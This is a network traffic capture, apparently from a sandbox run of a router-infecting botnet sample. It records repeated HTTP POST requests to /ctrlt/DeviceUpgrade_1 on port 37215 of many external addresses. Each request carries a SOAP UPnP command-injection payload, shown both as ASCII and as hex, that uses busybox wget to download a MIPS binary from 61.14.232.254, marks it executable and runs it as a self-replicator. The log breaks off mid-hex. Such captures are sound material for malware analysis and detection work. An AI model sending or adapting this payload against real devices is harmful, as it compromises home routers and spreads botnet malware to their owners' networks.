                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                  May 29, 2024 15:15:25.522645950 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2242192.168.2.134995241.186.69.13237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.743622065 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                  May 29, 2024 15:15:25.042723894 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                  May 29, 2024 15:15:25.522665024 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2243192.168.2.1356444197.85.210.6737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.744544983 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                  May 29, 2024 15:15:25.042748928 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                  May 29, 2024 15:15:25.522649050 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2244192.168.2.134584648.156.53.19537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.744563103 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                  May 29, 2024 15:15:25.042747021 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                  May 29, 2024 15:15:25.522649050 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2245192.168.2.1337606157.61.160.15137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.744580030 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 